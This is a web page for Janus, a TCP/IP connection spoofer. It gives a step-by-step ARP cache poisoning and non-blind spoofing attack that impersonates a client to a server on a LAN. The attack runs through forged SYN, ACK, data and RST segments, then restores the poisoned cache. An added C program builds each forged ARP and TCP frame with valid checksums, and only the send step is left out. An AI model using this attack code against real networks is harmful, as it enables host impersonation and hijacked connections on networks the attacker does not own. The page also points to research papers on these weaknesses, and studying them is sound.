Janus
About
Janus is a non-blind TCP/IP connection spoofer. It allows you to forge a fully open connection while masquerading as another active host on the LAN or segment. To stop the host being spoofed from interfering (it would reset a connection it never opened), Janus implements ARP cache poisoning. To find out more about this type of attack read our two detailed papers on the subject:
Security Weaknesses Inherent in the Design of TCP Over IP [PDF]
ARP Poisoning : An investigation into spoofing the Address Resolution Protocol [PDF]
The Players

| Name | IP Address | MAC Address |
| Server | 192.168.0.1 | 00-A0-20-DD-EE-AA |
| Client | 192.168.0.2 | 00-A0-20-DD-EE-BB |
| Attacker | 192.168.0.3 | 00-A0-20-DD-EE-CC |
The Objective
The attacking host must establish a fully open TCP/IP connection to the server while masquerading as the client. If the client saw the server's SYN/ACK for a connection it never opened it would answer with a RST and tear the connection down, so the attacker first alters the server's ARP cache, replacing its entry for the client's MAC address with a fake, unused one. The client's ARP cache is left untouched. Every subsequent Ethernet frame (and the packet it encapsulates) that the attacker sends to the server while masquerading as the client carries that fake MAC as its source address, matching the server's poisoned cache entry. The server's replies are addressed to the same fake MAC, so they never reach the client; the attacker reads them off the wire instead.
The Attack
- Get the client's MAC address (00-A0-20-DD-EE-BB)
- Get the server's MAC address (00-A0-20-DD-EE-AA)
- Choose a fake, unused MAC address to substitute for the client's (e.g. 00-A0-20-DD-EE-FF)
- Poison the server's ARP cache with a forged ARP reply, changing its entry for the client to the fake MAC
- Send the first packet of the TCP three-way handshake (SYN) to the server, masquerading as the client
- Read the server's response (the second packet, SYN/ACK) off the wire; its sequence number is what makes the spoof non-blind
- Send the third packet of the handshake (ACK) to the server, masquerading as the client
- The connection is now open, so send any and all data
- Close the connection by sending a RST packet to the server, masquerading as the client; unlike a FIN, a RST needs no acknowledgement exchange
- Restore the server's ARP cache with a second forged ARP reply carrying the client's real MAC address
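The frames the steps above require, built in memory as an added example (this is not Janus's own code). It forges the poisoning ARP reply, the spoofed SYN, ACK, data and RST segments with correct IP and TCP checksums, and the restoring ARP reply, and runs the whole sequence through checksum verification. MAC and IP addresses are the ones from the table above; the /24 mask, ports 1025 and 80, TTL, IP ID, window size and the server's initial sequence number are assumptions, since nothing is captured here. Putting a frame on the wire needs a raw socket or libnet and is deliberately left out so the example runs offline.

```c
/* Added example (not Janus's own code): build the frames the attack needs
 * in memory: the poisoning ARP reply, the spoofed SYN / ACK / data / RST,
 * and the restoring ARP reply. Sending needs a raw socket or libnet and is
 * left out so this runs offline. MACs and IPs are the page's; the /24 mask,
 * ports 1025/80, TTL, IP ID and window are assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static const uint8_t SERVER_MAC[6] = {0x00,0xA0,0x20,0xDD,0xEE,0xAA};
static const uint8_t CLIENT_MAC[6] = {0x00,0xA0,0x20,0xDD,0xEE,0xBB};
static const uint8_t FAKE_MAC[6]   = {0x00,0xA0,0x20,0xDD,0xEE,0xFF};  /* unused */
static const uint8_t SERVER_IP[4]  = {192,168,0,1};
static const uint8_t CLIENT_IP[4]  = {192,168,0,2};

static void put16(uint8_t *p, uint16_t v) { p[0] = v >> 8; p[1] = v & 0xFF; }
static void put32(uint8_t *p, uint32_t v) { put16(p, v >> 16); put16(p + 2, v & 0xFFFF); }
/* RFC 1071 ones'-complement sum; a trailing odd byte is zero-padded. */
static uint32_t ocsum(uint32_t acc, const uint8_t *p, size_t n) {
    for (; n > 1; p += 2, n -= 2) acc += (uint32_t)(p[0] << 8 | p[1]);
    if (n) acc += (uint32_t)p[0] << 8;
    return acc;
}
static uint16_t fold(uint32_t acc) {
    while (acc >> 16) acc = (acc & 0xFFFF) + (acc >> 16);
    return (uint16_t)~acc;
}
static size_t eth_hdr(uint8_t *f, const uint8_t *dst, const uint8_t *src, uint16_t type) {
    memcpy(f, dst, 6); memcpy(f + 6, src, 6); put16(f + 12, type);
    return 14;
}

/* Unsolicited ARP reply to the server claiming CLIENT_IP is at claimed_mac:
 * FAKE_MAC poisons the server's entry, CLIENT_MAC restores it afterwards. */
size_t build_arp_reply(uint8_t *f, const uint8_t *claimed_mac) {
    uint8_t *a = f + eth_hdr(f, SERVER_MAC, claimed_mac, 0x0806);
    put16(a, 1); put16(a + 2, 0x0800); a[4] = 6; a[5] = 4;  /* HTYPE, PTYPE, HLEN, PLEN */
    put16(a + 6, 2);                                         /* OPER = reply */
    memcpy(a + 8, claimed_mac, 6); memcpy(a + 14, CLIENT_IP, 4);   /* the lie */
    memcpy(a + 18, SERVER_MAC, 6); memcpy(a + 24, SERVER_IP, 4);
    return 14 + 28;
}

/* Ethernet/IPv4/TCP (no options) from CLIENT_IP to the server, sourced from
 * FAKE_MAC to match the poisoned entry, so the server's replies go to a MAC
 * nobody owns. flags: 0x02 SYN, 0x10 ACK, 0x08 PSH, 0x04 RST. Returns length. */
size_t build_tcp_frame(uint8_t *f, uint16_t sport, uint16_t dport, uint32_t seq,
                       uint32_t ack, uint8_t flags, const uint8_t *payload, size_t plen) {
    uint8_t *ip = f + eth_hdr(f, SERVER_MAC, FAKE_MAC, 0x0800), *tcp = ip + 20, ph[12];
    memset(ip, 0, 40 + plen);
    ip[0] = 0x45; put16(ip + 2, (uint16_t)(40 + plen)); put16(ip + 4, 0x1234);
    ip[8] = 64; ip[9] = 6;                                   /* TTL, protocol = TCP */
    memcpy(ip + 12, CLIENT_IP, 4); memcpy(ip + 16, SERVER_IP, 4);
    put16(ip + 10, fold(ocsum(0, ip, 20)));
    put16(tcp, sport); put16(tcp + 2, dport); put32(tcp + 4, seq); put32(tcp + 8, ack);
    tcp[12] = 0x50; tcp[13] = flags; put16(tcp + 14, 8192);  /* data offset 5, window */
    if (plen) memcpy(tcp + 20, payload, plen);
    /* TCP checksum covers the pseudo-header (src, dst, 0, proto, length) + segment */
    memcpy(ph, CLIENT_IP, 4); memcpy(ph + 4, SERVER_IP, 4);
    ph[8] = 0; ph[9] = 6; put16(ph + 10, (uint16_t)(20 + plen));
    put16(tcp + 16, fold(ocsum(ocsum(0, ph, 12), tcp, 20 + plen)));
    return 14 + 40 + plen;
}

/* The non-blind part: the server's ISN is read out of its captured SYN/ACK
 * rather than guessed. Assumes a 20-byte IP header. */
uint32_t frame_tcp_seq(const uint8_t *f) {
    const uint8_t *t = f + 38;
    return (uint32_t)t[0] << 24 | (uint32_t)t[1] << 16 | (uint32_t)t[2] << 8 | t[3];
}
/* A correct checksum makes the ones'-complement sum over its range fold to 0. */
int ip_checksum_ok(const uint8_t *f) { return fold(ocsum(0, f + 14, 20)) == 0; }
int tcp_checksum_ok(const uint8_t *f, size_t flen) {
    uint8_t ph[12];
    memcpy(ph, f + 26, 8); ph[8] = 0; ph[9] = 6; put16(ph + 10, (uint16_t)(flen - 34));
    return fold(ocsum(ocsum(0, ph, 12), f + 34, flen - 34)) == 0;
}

/* The attack as a frame sequence, poison through restore; server_isn stands in
 * for the value pulled from the captured SYN/ACK. Returns 1 if every frame checks. */
int run_sequence(uint32_t server_isn) {
    uint8_t f[128]; size_t n; uint32_t isn = 0x11223344u;
    static const uint8_t data[5] = {'h','e','l','l','o'};    /* constructed payload */
    n = build_arp_reply(f, FAKE_MAC);                                    /* poison */
    if (n != 42 || f[21] != 2 || memcmp(f + 22, FAKE_MAC, 6)) return 0;
    n = build_tcp_frame(f, 1025, 80, isn, 0, 0x02, NULL, 0);             /* SYN */
    if (n != 54 || frame_tcp_seq(f) != isn || !ip_checksum_ok(f) || !tcp_checksum_ok(f, n)) return 0;
    n = build_tcp_frame(f, 1025, 80, isn + 1, server_isn + 1, 0x10, NULL, 0);  /* ACK */
    if (!tcp_checksum_ok(f, n)) return 0;
    n = build_tcp_frame(f, 1025, 80, isn + 1, server_isn + 1, 0x18, data, 5);  /* data */
    if (n != 59 || !tcp_checksum_ok(f, n)) return 0;                     /* odd length */
    n = build_tcp_frame(f, 1025, 80, isn + 6, server_isn + 1, 0x04, NULL, 0);  /* RST */
    if (!tcp_checksum_ok(f, n)) return 0;
    n = build_arp_reply(f, CLIENT_MAC);                                  /* restore */
    return n == 42 && memcmp(f + 22, CLIENT_MAC, 6) == 0;
}

int main(void) {
    printf("attack frame sequence: %s\n", run_sequence(0x9abcdef0u) ? "ok" : "FAILED");
    return 0;
}
```

The ARP reply is sent unicast to the server's MAC rather than broadcast, so only the server's cache changes and the client keeps its correct entry, which is what the objective above requires. The data segment is 59 bytes on purpose: its odd length exercises the zero-padding rule of the TCP checksum, a common source of bugs in hand-rolled packet builders.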
The Code
Janus is written in C and relies on the libpcap and libnet libraries for low-level packet capture, creation and injection. You will need both libraries installed to compile the source.